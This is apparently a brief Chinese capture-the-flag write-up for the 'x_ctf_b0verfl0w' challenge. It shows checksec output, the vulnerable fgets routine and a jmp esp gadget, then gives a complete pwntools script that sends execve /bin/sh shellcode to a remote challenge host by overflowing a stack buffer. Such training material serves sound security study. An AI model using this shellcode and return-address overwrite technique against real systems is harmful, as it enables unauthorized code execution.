x_ctf_b0verfl0w

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位，保护全关，写shellcode

int vul()
{
  char s[32]; // [esp+18h] [ebp-20h] BYREF

  puts("\n======================");
  puts("\nWelcome to X-CTF 2016!");
  puts("\n======================");
  puts("What's your name?");
  fflush(stdout);
  fgets(s, 0x32, stdin);
  printf("Hello %s.", s);
  fflush(stdout);
  return 1;
}

栈溢出

并且有个hit

.text:08048504                               ; ---------------------------------------------------------------------------
.text:08048504 FF E4                         jmp     esp
.text:08048504
.text:08048506                               ; ---------------------------------------------------------------------------
.text:08048506 C3                            retn
.text:08048506
.text:08048507                               ; ---------------------------------------------------------------------------
.text:08048507 B8 01 00 00 00                mov     eax, 1
.text:0804850C 5D                            pop     ebp
.text:0804850D C3                            retn
.text:0804850D                               ; } // starts at 80484FD
.text:0804850D

给出了jmp esp

思路

用jmp再去执行一次栈，栈里面写好shellcode

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27413,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')

esp=asm("sub esp,0x28;jmp esp")
pl=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
pl=pl.ljust(0x24,b'\x00')+p32(0x8048504)+esp
sl(pl)
ia()